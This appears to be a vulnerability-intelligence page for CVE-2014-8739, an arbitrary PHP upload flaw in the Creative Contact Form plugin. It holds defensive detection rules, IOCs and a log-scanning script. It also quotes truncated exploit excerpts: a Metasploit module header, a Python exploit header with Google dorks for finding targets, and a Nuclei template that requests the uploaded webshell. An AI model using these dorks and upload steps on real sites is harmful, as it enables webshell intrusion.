CVE-2014-8739
Published: 2020-02-08
Priority P194, critical, 9.8 (CVSS 3.1)
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 91.66% (99.8th percentile)
Unrestricted file upload vulnerability in server/php/UploadHandler.php in the jQuery File Upload Plugin 6.4.4 for jQuery, as used in the Creative Solutions Creative Contact Form (formerly Sexy Contact Form) before 1.0.0 for WordPress and before 2.0.1 for Joomla!, allows remote attackers to execute arbitrary code by uploading a PHP file with a PHP extension, then accessing it via a direct request to the file in files/, as exploited in the wild in October 2014.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| creative-solutions | creative_contact_form | < 1.0.0 | 1.0.0 |
| creative-solutions | creative_contact_form | < 2.0.1 | 2.0.1 |
| jquery_file_upload_project | jquery_file_upload | — | — |
Detection & IOCs
path: /wp-content/plugins/sexy-contact-form/includes/fileupload/files/
bytes: ----------lImIt_of_THE_fIle_eW_$
- Detect POST requests to the WordPress plugin upload endpoint with a PHP file in the multipart filename field (files[])
- Alert on HTTP 200 responses from the upload endpoint whose body contains both 'files' and 'delete_url', indicating successful PHP shell upload
- Monitor for direct GET requests to .php files under the plugin's files/ directory, indicating webshell execution after upload
- Flag multipart upload requests using the distinctive boundary string '----------lImIt_of_THE_fIle_eW_$' as a known exploit tool signature
- Check plugin readme for version below 1.0.0 on WordPress to confirm vulnerable Creative Contact Form installation
- The vulnerability was actively exploited in the wild in October 2014; patched versions are Creative Contact Form >= 1.0.0 (WordPress) and >= 2.0.1 (Joomla!)
- The upload handler does not restrict PHP file extensions, meaning any .php file submitted via the files[] field is stored and directly executable under the files/ directory
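The access-log side of the checks above, as an added example (not code from this page or any of its sources): it flags requests for .php files under files/ and raises the severity when the same client was earlier seen POSTing to the upload directory. It assumes combined-format access logs and that the upload handler sits in the parent directory of files/; the sample log lines and the handler file name are constructed placeholders.

```python
import re
from urllib.parse import unquote, urlsplit

# files/ path as given on this page; assumption: the upload handler sits in its parent.
FILES_DIR = "/wp-content/plugins/sexy-contact-form/includes/fileupload/files/"
UPLOAD_DIR = FILES_DIR[: -len("files/")]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})\b')
PHP_RE = re.compile(r"\.php(/|$)")  # also catches PATH_INFO forms such as x.php/extra

def normalise(target):
    """Drop the query string, decode percent-escapes, lower-case the path."""
    return unquote(urlsplit(target).path).lower()

def scan(lines):
    """Return (severity, client_ip, path) tuples from combined-format access log lines."""
    uploaders, findings = set(), []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line this parser understands
        ip, path, ok = m["ip"], normalise(m["target"]), m["status"] == "200"
        in_files = path.startswith(FILES_DIR)
        if m["method"] == "POST" and path.startswith(UPLOAD_DIR) and not in_files:
            if ok:
                uploaders.add(ip)  # remember clients whose upload request returned 200
            findings.append(("info", ip, path))
        elif in_files and PHP_RE.search(path):
            if not ok:
                sev = "low"       # request for a .php file that was not served
            elif ip in uploaders:
                sev = "critical"  # same client uploaded, then a .php file was served
            else:
                sev = "high"      # .php served from files/ with no upload seen
            findings.append((sev, ip, path))
    return findings

# Constructed sample log lines; handler-placeholder.php is a placeholder name.
TS = "[25/Oct/2014:10:00:00 +0000]"
SAMPLE = [
    f'203.0.113.7 - - {TS} "POST {UPLOAD_DIR}handler-placeholder.php HTTP/1.1" 200 312',
    f'203.0.113.7 - - {TS} "GET {FILES_DIR}abc.php HTTP/1.1" 200 41',
    f'198.51.100.9 - - {TS} "GET {FILES_DIR}photo.jpg HTTP/1.1" 200 9001',
    f'198.51.100.9 - - {TS} "GET {FILES_DIR}x%2EPHP?a=1 HTTP/1.1" 404 0',
    f'192.0.2.5 - - {TS} "GET {FILES_DIR}t.php HTTP/1.1" 200 17',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding)
```

Access logs do not record the multipart body, so the filename and boundary-string checks in the list need request inspection at a WAF or proxy instead.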
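CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vulncheck | — | 9.8 | CRITICAL | — |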
OSV
jQuery File Upload Plugin Unrestricted file upload vulnerability
osv·2022-05-17
CVE-2014-8739 [HIGH] jQuery File Upload Plugin Unrestricted file upload vulnerability
GHSA
jQuery File Upload Plugin Unrestricted file upload vulnerability
ghsa·2022-05-17
CVE-2014-8739 [HIGH] CWE-434 jQuery File Upload Plugin Unrestricted file upload vulnerability
VulnCheck
creative-solutions creative_contact_form Unrestricted Upload of File with Dangerous Type
vulncheck·2014·CVSS 9.8
CVE-2014-8739 [CRITICAL] creative-solutions creative_contact_form Unrestricted Upload of File with Dangerous Type
Affected: creative-solutions creative_contact_form
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://nv
No detection rules found.
Exploit-DB
WordPress Plugin Creative Contact Form - Arbitrary File Upload (Metasploit)
exploitdb·2015-04-21
CVE-2014-8739 WordPress Plugin Creative Contact Form - Arbitrary File Upload (Metasploit)
---
```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'Wordpress Creative Contact Form Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the WordPress Creative Contact
        Form version 0.9.7. The vulnerability allows for arbitrary file upload and remote code execution.
      },
      'Author'         =>
        [
          'Gianni Angelozzi', # Vulnerability discovery
          'Roberto Soares Espreto ' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['EDB', '35057'],
          ['OSVDB', '113669'],
          ['WPVDB', '7652']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Ta
```
Exploit-DB
WordPress Plugin 0.9.7 / Joomla! Component 2.0.0 Creative Contact Form - Arbitrary File Upload
exploitdb·2014-10-25
CVE-2014-8739 WordPress Plugin 0.9.7 / Joomla! Component 2.0.0 Creative Contact Form - Arbitrary File Upload
---
```python
#!/usr/bin/python
#
# Exploit Name: Wordpress and Joomla Creative Contact Form Shell Upload Vulnerability
# Wordpress plugin version: <= 0.9.7
# Joomla extension version: <= 2.0.0
#
# Vulnerability discovered by Gianni Angelozzi
#
# Exploit written by Claudio Viviani
#
# Dork google wordpress: inurl:inurl:sexy-contact-form
# Dork google joomla : inurl:com_creativecontactform
#
# Tested on BackBox 3.x
#
# http connection
import urllib, urllib2, sys, mimetypes
# Args management
import optparse
# file management
import os, os.path

# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// protocol')
        sys.exit(1)
    else:
        return
```
Nuclei
WordPress Sexy Contact Form (<= 0.9.7) - Arbitrary File Upload
nuclei·CVSS 9.8
CVE-2014-8739 [CRITICAL] WordPress Sexy Contact Form (<= 0.9.7) - Arbitrary File Upload
WordPress Sexy Contact Form (
```yaml
        ------WebKitFormBoundary7MA4YWxkTrZu0gW--
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "files","delete_url")'
          - 'contains(content_type, "text/plain")'
        condition: and
        internal: true
  - raw:
      - |
        GET /wp-content/plugins/sexy-contact-form/includes/fileupload/files/{{fname}}.php HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: word
        words:
          - "{{marker}}"
# digest: 4a0a00473045022061fd30b9aef3122e547abfd9d23f5c5495e7db05ce19dd04f6c59c4f06263ff202210083e715ff0053464d8e79e1fcf5b0cb50ba58b6e707df512912432f3b9349089a:922c64590222798bb761d5b6d8e72950
```
Metasploit
Wordpress Creative Contact Form Upload Vulnerability
metasploit
This module exploits an arbitrary PHP code upload in the WordPress Creative Contact Form version 0.9.7. The vulnerability allows for arbitrary file upload and remote code execution.
No writeups or analysis indexed.
- http://osvdb.org/show/osvdb/113669
- http://osvdb.org/show/osvdb/113673
- http://www.openwall.com/lists/oss-security/2014/11/11/4
- http://www.openwall.com/lists/oss-security/2014/11/11/5
- http://www.openwall.com/lists/oss-security/2014/11/13/3
- https://wordpress.org/plugins/sexy-contact-form/changelog/
- https://www.exploit-db.com/exploits/35057/
- https://www.exploit-db.com/exploits/36811/